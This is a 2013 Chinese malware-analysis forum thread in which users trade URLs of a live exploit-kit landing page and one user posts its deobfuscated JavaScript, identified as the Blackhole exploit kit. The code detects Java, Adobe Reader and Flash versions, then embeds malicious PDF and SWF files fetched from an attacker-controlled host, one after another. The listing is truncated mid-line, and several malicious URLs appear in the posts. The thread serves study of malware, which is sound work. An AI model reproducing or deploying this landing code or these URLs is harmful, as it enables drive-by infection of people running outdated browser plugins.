http://1nucleihadjitheodosiou.charmist.org/nuisance_neglect.html

墨家小子

Cool exploit kit

http://bbs.kafan.cn/thread-1555089-1-1.html

蓝核

已失效……404……

墨家小子

蓝核 发表于 2013-4-24 23:09
已失效……404……

http://mikrochemie-priorem.constructionjunctionsupply.com/nuisance_neglect.html

蓝核

墨家小子 发表于 2013-4-24 23:12
http://mikrochemie-priorem.constructionjunctionsupply.com/nuisance_neglect.html

我今天已经被打击到不行……求继续虐……我准备把不会全部提升

蓝核

跟进补充，还是这个系列……PMS貌似拉黑……思密达……

但是解我就……

墨家小子

蓝核 发表于 2013-4-24 23:17
跟进补充，还是这个系列……PMS貌似拉黑……思密达……

但是解我就……

2`3个小时就出来一个

dayangyang

加密部分解混淆下来：

1. var pdpd={
   
2.       version:"0.7.9",name:"pdpd",handler:function(c,b,a){
   
3.       return function(){
   
4.       c(b,a)}
   
5.       }
   
6.       ,openTag:"<",isDefined:function(b){
   
7.       return typeof b!="undefined"}
   
8.       ,isArray:function(b){
   
9.       return(/array/i).test(Object.prototype.toString.call(b))}
   
10.       ,isFunc:function(b){
    
11.       return typeof b=="function"}
    
12.       ,isString:function(b){
    
13.       return typeof b=="string"}
    
14.       ,isNum:function(b){
    
15.       return typeof b=="number"}
    
16.       ,isStrNum:function(b){
    
17.       return(typeof b=="string"&&(/\d/).test(b))}
    
18.       ,getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]/g,getNum:function(b,c){
    
19.       var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;
    
20.     return a?a[0]:null}
    
21.       ,compareNums:function(h,f,d){
    
22.       var e=this,c,b,a,g=parseInt;
    
23.     if(e.isStrNum(h)&&e.isStrNum(f)){
    
24.       if(e.isDefined(d)&&d.compareNums){
    
25.       return d.compareNums(h,f)}
    
26.       c=h.split(e.splitNumRegx);
    
27.     b=f.split(e.splitNumRegx);
    
28.     for(a=0;
    
29.     a<Math.min(c.length,b.length);
    
30.     a++){
    
31.       if(g(c[a],10)>g(b[a],10)){
    
32.       return 1}
    
33.       if(g(c[a],10)<g(b[a],10)){
    
34.       return -1}
    
35.       }
    
36.       }
    
37.       return 0}
    
38.       ,formatNum:function(b,c){
    
39.       var d=this,a,e;
    
40.     if(!d.isStrNum(b)){
    
41.       return null}
    
42.       if(!d.isNum(c)){
    
43.       c=4}
    
44.       c--;
    
45.     e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);
    
46.     for(a=0;
    
47.     a<4;
    
48.     a++){
    
49.       if(/^(0+)(.+)$/.test(e[a])){
    
50.       e[a]=RegExp.$2}
    
51.       if(a>c||!(/\d/).test(e[a])){
    
52.       e[a]="0"}
    
53.       }
    
54.       return e.slice(0,4).join(",")}
    
55.       ,$hasMimeType:function(a){
    
56.       return function(c){
    
57.       if(!a.isIE&&c){
    
58.       var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);
    
59.     for(b=0;
    
60.     b<d.length;
    
61.     b++){
    
62.       if(a.isString(d[b])&&/[^\s]/.test(d[b])){
    
63.       f=navigator.mimeTypes[d[b]];
    
64.     e=f?f.enabledPlugin:0;
    
65.     if(e&&(e.name||e.description)){
    
66.       return ....body.appendChild(d);
    
67.     }
    
68.       function p2(){
    
69.       var d=document.createElement("object");
    
70.     d.setAttribute("width",100);
    
71.     d.setAttribute("height",100);
    
72.     d.setAttribute("data","http://olentona.controlled-rot.com/mother-selfish_shortly-widely.pdf");
    
73.     d.setAttribute("type","application/pdf");
    
74.     document.body.appendChild(d);
    
75.     }
    
76.       function ff(){
    
77.       var oSpan=document.createElement("span");
    
78.     document.body.appendChild(oSpan);
    
79.     var url = "http://olentona.controlled-rot.com/cope-civilian-hotel.swf";
    
80.     oSpan.innerHTML="<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' id='asd' width='600' height='400' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='"+url+"' /><embed src='"+url+"' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
    
81.     }
    
82.       var aa=[];
    
83.     jver=pdpd.getVersion("Java");
    
84.     if(jver!=null){
    
85.       jver=jver.split(".");
    
86.     }
    
87.       else{
    
88.       jver=[0,0,0,0];
    
89.     }
    
90.       pver=pdpd.getVersion("AdobeReader");
    
91.     if(pver!=null){
    
92.       pver=pver.split(".");
    
93.     }
    
94.       else{
    
95.       pver=[0,0,0,0];
    
96.     }
    
97.       fver=pdpd.getVersion("Flash");
    
98.     if(fver!=null){
    
99.       fver=fver.split(".");
    
100.     }
     
101.       else{
     
102.       fver=[0,0,0,0];
     
103.     }
     
104.       if((jver[1]<6)||((jver[1]==6)&&(jver[3]<33))||((jver[1]==7)&&(jver[3]<11))){
     
105.       aa.push(function(){
     
106.       }
     
107.       );
     
108.     }
     
109.       if((pver[0]==8)||((pver[0]==9)&&(pver[1]<4))){
     
110.       aa.push(p2);
     
111.     }
     
112.       if((pver[0]>0)&&(pver[0]<8)){
     
113.       aa.push(p1);
     
114.     }
     
115.       if((fver[0]>0)){
     
116.       aa.push(ff);
     
117.     }
     
118.       var ci=0;
     
119.     var arcall = function(){
     
120.       if(aa.length<=ci)return;
     
121.     aa[ci]();
     
122.     ci++;
     
123.     setTimeout(function(){
     
124.       arcall()}
     
125.       ,15000);
     
126.     }
     
127.       ;
     
128.     arcall();
     
129.    

复制代码

dayangyang

Blackhole  exploit 。。。
只有Blackhole 才如此cool
参考http://playingwithothers.com/201 ... -my-morning-coffee/
有兴趣可以照着调试下~~保证功力大增